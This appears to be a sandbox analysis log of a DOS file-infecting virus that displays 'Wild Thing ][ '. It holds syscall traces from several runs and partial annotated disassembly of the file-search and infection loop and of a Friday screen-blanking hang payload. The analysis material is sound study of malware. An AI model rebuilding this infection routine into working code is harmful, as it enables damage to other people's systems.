2018-12-25T11:45:47.553942717Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:47.562380643Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:47.572305718Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.574721897Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:47.581314859Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:47.590795034Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:47.597336509Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:47.59954399Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:47.605891318Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.607309994Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:47.611298911Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.613098334Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:47.621386099Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:47.624184762Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:47.631779367Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:47.641262731Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.644377877Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:47.649794359Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:47.659297578Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:47.666214195Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:47.667554821Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:47.673600748Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.675328802Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:47.677857567Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.679369122Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:47.688040189Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:47.689488548Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:47.69707151Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:47.707999293Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.710681206Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:47.716473282Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:47.727524404Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:47.734913478Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:47.73665954Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:47.7442206Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.745790215Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:47.748233753Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.7504813Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:47.759272678Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:47.760596636Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:47.768777648Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:47.778432933Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.781047082Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:47.78765834Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:47.797167358Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:47.808147075Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:47.810142279Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:47.816837876Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.818039394Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:47.821200197Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.822721381Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:47.830482624Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:47.832381974Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:47.839928681Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:47.849719595Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.853261787Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:47.859135159Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:47.868667831Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:47.880016292Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:47.882147105Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:47.888912922Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:47.89044038Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:47.898850943Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:47.908800669Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.911502611Z 59 PC: 12e83 | Change current directory
2018-12-25T11:45:47.916671664Z 59 PC: 12e8d | Change current directory
2018-12-25T11:45:47.918251414Z 26 PC: 12f84 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":2417,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:48.214749305Z 26 PC: 12f84 | Set disk transfer address
2018-12-25T11:45:48.216476891Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
; Directory-scan loop of the sample, disassembled at the traced PC (Intel syntax, 16-bit DOS code).
; The listing starts mid-routine and stops before the last int 0x21.
; Every data reference is bp-relative; bp presumably holds the code's own base offset
; (its setup is not shown here, TODO confirm).
0x12e4d: je 0x12e46                         ; DH == 0 after the "Get time" call (cmp dh, 0 at 0x12e4a): back to 0x12e46 (not shown; presumably re-reads the clock)
0x12e4f: mov byte ptr [bp + 0x32e], dh      ; keep the non-zero DH (seconds field of INT 21h/2Ch) in a bp-relative variable
0x12e53: mov ah, 0x47                       ; INT 21h AH=47h: get current directory
0x12e55: mov dl, 0                          ; DL = 0 selects the default drive
0x12e57: lea si, word ptr [bp + 0x34a]      ; DS:SI = buffer that receives the path
0x12e5b: int 0x21                           ; logged in the trace as "Get current directory" (PC 12e5d)
0x12e5d: call 0x12f46                       ; callee issues "Get date" (trace PC 12f4a) and tests the weekday; entry 0x12f46 itself is not shown
0x12e60: call 0x12f6a                       ; callee runs a "Find first file" on the filespec at bp+0x2d1 (trace PC 12f75)
0x12e63: mov ah, 0x4e                       ; INT 21h AH=4Eh: find first matching file
0x12e65: lea dx, word ptr [bp + 0x2cb]      ; DS:DX = filespec string (contents not shown in this listing)
0x12e69: mov cx, 7                          ; attribute mask 7 = read-only | hidden | system, so such files are matched too
0x12e6c: int 0x21                           ; shared by find-first and find-next (jmp at 0x12e79 re-enters here)
0x12e6e: jb 0x12e7b                         ; CF set = no (more) matches: leave the loop
0x12e70: lea dx, word ptr [bp + 0x3a8]      ; DS:DX = name of the file just found (presumably the filename field of the DTA, TODO confirm)
0x12e74: call 0x12eaf                       ; per-file routine (not shown). The trace rows at PC 12eb5..12f3a show it changing
                                            ; attributes, opening the file, reading 3 bytes, writing 3 and 557 bytes, and calling
                                            ; get/set date-time and attributes again before returning; file size growth is the visible artefact.
0x12e77: mov ah, 0x4f                       ; INT 21h AH=4Fh: find next matching file
0x12e79: jmp 0x12e6c                        ; loop until DOS reports no further match
0x12e7b: lea dx, word ptr [bp + 0x2e1]      ; DS:DX = directory path string (contents not shown)
0x12e7f: mov ah, 0x3b                       ; INT 21h AH=3Bh: change directory; the listing ends before the int 0x21 that would issue it
2018-12-25T11:45:48.218603668Z 71 PC: 12e5d | Get current directory
2018-12-25T11:45:48.221621197Z 42 PC: 12f4a | Get date 0x12f4a: cmp al, 5
; Date check and screen payload of the sample, followed by the start of a find-first helper
; (Intel syntax, 16-bit DOS code). The listing starts after the "Get date" call and is cut
; off before 0x12f78.
0x12f4c: je 0x12f4f                         ; AL == 5 (cmp al, 5 at 0x12f4a): INT 21h/2Ah returns the weekday in AL, 0 = Sunday, so 5 = Friday
0x12f4e: ret                                ; any other weekday: return to the caller without touching the screen
0x12f4f: mov ah, 1                          ; INT 10h AH=01h: set text cursor shape
0x12f51: mov cx, 0x2020                     ; CH = 0x20 has bit 5 set, which hides the cursor
0x12f54: int 0x10
0x12f56: mov ah, 2                          ; INT 10h AH=02h: set cursor position
0x12f58: xor dx, dx                         ; DH = row 0, DL = column 0
0x12f5a: int 0x10
0x12f5c: xor ax, ax                         ; AH=00h set video mode, AL = mode 0
0x12f5e: int 0x10
0x12f60: mov ah, 9                          ; INT 21h AH=09h: print '$'-terminated string
0x12f62: lea dx, word ptr [bp + 0x271]      ; DS:DX = message text (contents not shown in this listing)
0x12f66: int 0x21
0x12f68: jmp 0x12f68                        ; jumps to itself: the machine hangs here until reset
; NOTE(review): no "Display string" row with PC 12f68 appears in the visible part of this run's
; trace, so this branch was apparently not taken here.
0x12f6a: mov ah, 0x4e                       ; separate helper (called from 0x12e60): INT 21h AH=4Eh find first
0x12f6c: lea dx, word ptr [bp + 0x2d1]      ; DS:DX = filespec string (contents not shown)
0x12f70: mov cx, 7                          ; attribute mask 7 = read-only | hidden | system
0x12f73: int 0x21                           ; logged in the trace as "Find first file" (PC 12f75)
0x12f75: jae 0x12f78                        ; CF clear = a match was found: continue at 0x12f78 (not shown)
2018-12-25T11:45:48.224299955Z 78 PC: 12f75 | Find first file
2018-12-25T11:45:48.230662301Z 78 PC: 12e6e | Find first file
2018-12-25T11:45:48.236742975Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T11:45:48.243213481Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T11:45:48.262939998Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:45:48.275705847Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T11:45:48.277307317Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:45:48.284214877Z 66 PC: 12f45 | Move file pointer
2018-12-25T11:45:48.2855347Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:45:48.288287136Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.29020352Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-25T11:45:48.299886116Z 87 PC: 12f2c | Get or set file date and time
2018-12-25T11:45:48.301497611Z 62 PC: 12f30 | Close file
2018-12-25T11:45:48.309568554Z 67 PC: 12f3a | Get or set file attributes
2018-12-25T11:45:48.315840379Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:48.317605516Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:48.321607944Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:48.327870662Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:48.335020502Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:48.33637377Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:48.343712795Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.345135094Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:48.34834379Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.350076523Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:48.35884275Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:48.360840503Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:48.369218648Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:48.379918941Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:48.38311031Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:48.389385381Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:48.399950635Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:48.408319889Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:48.409857551Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:48.416702863Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.418405917Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:48.421639132Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.423262865Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:48.431835594Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:48.434084362Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:48.442615866Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:48.453583971Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:48.456780249Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:48.462979846Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:48.473997797Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:48.481777113Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:48.483237092Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:48.490753643Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.492794613Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:48.495639659Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.497178213Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:48.630235357Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:48.63161306Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:48.814194281Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:48.829558561Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:48.833229807Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:48.839353304Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:48.87137974Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:48.878714826Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:48.880136664Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:48.887434959Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.888882928Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:48.891651671Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.893596118Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:48.910425532Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:48.911966626Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:48.931681591Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:48.9517598Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:48.954440588Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:48.960399488Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:48.983075477Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:48.990011996Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:48.991313664Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:48.998406107Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.999666546Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:49.002355912Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.004292882Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:49.034720005Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:49.037066151Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:49.065639417Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:49.102153153Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.105673866Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:49.11261279Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:49.138405581Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:49.145828707Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:49.148196555Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:49.155463568Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.156903237Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:49.160344736Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.162915052Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:49.18362293Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:49.185770596Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:49.221317207Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:49.267145761Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.270465613Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:49.274246268Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:49.307752136Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:49.315851706Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:49.317327213Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:49.324500892Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:49.326274278Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:49.359864652Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:49.410779099Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.413809932Z 59 PC: 12e83 | Change current directory
2018-12-25T11:45:49.418223045Z 59 PC: 12e8d | Change current directory
2018-12-25T11:45:49.420011389Z 26 PC: 12f84 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2417,"SideJobID":0}


Syscalls:

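Time | Syscall Op (INT 21h function number from AH, in decimal; e.g. 71 = 47h) | PC (address of the instruction after the INT) | Syscall Name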
2018-12-25T11:45:48.418210533Z 26 PC: 12f84 | Set disk transfer address
2018-12-25T11:45:48.419702937Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32e], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x34a]
0x12e5b: int 0x21
0x12e5d: call 0x12f46
0x12e60: call 0x12f6a
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2cb]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a8]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2e1]
0x12e7f: mov ah, 0x3b
2018-12-25T11:45:48.421965326Z 71 PC: 12e5d | Get current directory
2018-12-25T11:45:48.424901839Z 42 PC: 12f4a | Get date 0x12f4a: cmp al, 5
0x12f4c: je 0x12f4f
0x12f4e: ret
0x12f4f: mov ah, 1
0x12f51: mov cx, 0x2020
0x12f54: int 0x10
0x12f56: mov ah, 2
0x12f58: xor dx, dx
0x12f5a: int 0x10
0x12f5c: xor ax, ax
0x12f5e: int 0x10
0x12f60: mov ah, 9
0x12f62: lea dx, word ptr [bp + 0x271]
0x12f66: int 0x21
0x12f68: jmp 0x12f68
0x12f6a: mov ah, 0x4e
0x12f6c: lea dx, word ptr [bp + 0x2d1]
0x12f70: mov cx, 7
0x12f73: int 0x21
0x12f75: jae 0x12f78
2018-12-25T11:45:48.427109525Z 78 PC: 12f75 | Find first file
2018-12-25T11:45:48.431173206Z 78 PC: 12e6e | Find first file
2018-12-25T11:45:48.435025401Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T11:45:48.438677578Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T11:45:48.454646802Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:45:48.467964357Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T11:45:48.469270755Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:45:48.477179036Z 66 PC: 12f45 | Move file pointer
2018-12-25T11:45:48.478897093Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:45:48.481592327Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.483917067Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-25T11:45:48.577657843Z 87 PC: 12f2c | Get or set file date and time
2018-12-25T11:45:48.578876964Z 62 PC: 12f30 | Close file
2018-12-25T11:45:48.677268942Z 67 PC: 12f3a | Get or set file attributes
2018-12-25T11:45:48.739415616Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:48.741296893Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:48.745474489Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:48.814130356Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:48.822325647Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:48.82395266Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:48.831245583Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.832680921Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:48.835489176Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.837734669Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:48.84945945Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:48.851163845Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:48.874788414Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:48.889739982Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:48.89167024Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:48.89831068Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:48.915337697Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:48.922668953Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:48.924733166Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:48.932197591Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.933622772Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:48.936882001Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.938522511Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:48.957198886Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:48.959086229Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:48.983049644Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:48.999292253Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.001617039Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:49.005420415Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:49.034692277Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:49.0395992Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:49.041759724Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:49.048475161Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.049816351Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:49.052716278Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.054404201Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:49.075685193Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:49.077132784Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:49.102528628Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:49.138467282Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.142169324Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:49.148315468Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:49.183777317Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:49.191819335Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:49.193279661Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:49.200264108Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.202102278Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:49.205018612Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.206715061Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:49.232078228Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:49.233763536Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:49.267186066Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:49.308339267Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.311135423Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:49.317287531Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:49.36025456Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:49.367353978Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:49.368770998Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:49.375975616Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.377467425Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:49.380309951Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.382459371Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:49.41078198Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:49.412313948Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:49.472174301Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:49.553608711Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.556486824Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:49.563280245Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:49.677704903Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:49.685436854Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:49.687618576Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:49.69482197Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.696288507Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:49.699788816Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.701491823Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:49.761983516Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:49.764511358Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:49.837455322Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:49.914630298Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.918547257Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:49.925593076Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:50.009921832Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:50.017804631Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:50.019391375Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:50.0264677Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:50.02821572Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:50.110587933Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:50.202980296Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:50.206115939Z 59 PC: 12e83 | Change current directory
2018-12-25T11:45:50.210872314Z 59 PC: 12e8d | Change current directory
2018-12-25T11:45:50.212731899Z 26 PC: 12f84 | Set disk transfer address (See above)
2018-12-25T11:45:50.214313182Z 9 PC: 12ea4 | Display string (String= 'Wild Thing ][ ')
2018-12-25T11:45:52.396185696Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T11:45:52.398034275Z 72 PC: 8f1bd | Allocate memory
2018-12-25T11:45:52.401609942Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T11:45:52.404858621Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T11:45:52.416482953Z 66 PC: 91f95 | Move file pointer
2018-12-25T11:45:52.418285225Z 62 PC: 91fc1 | Close file
2018-12-25T11:45:52.421408622Z 75 PC: 91fe0 | Execute program
2018-12-25T11:45:52.438148266Z 98 PC: 916f1 | Get current PSP
2018-12-25T11:45:52.43940816Z 9 PC: c605 | Display string (String= '6��r�&;] u')
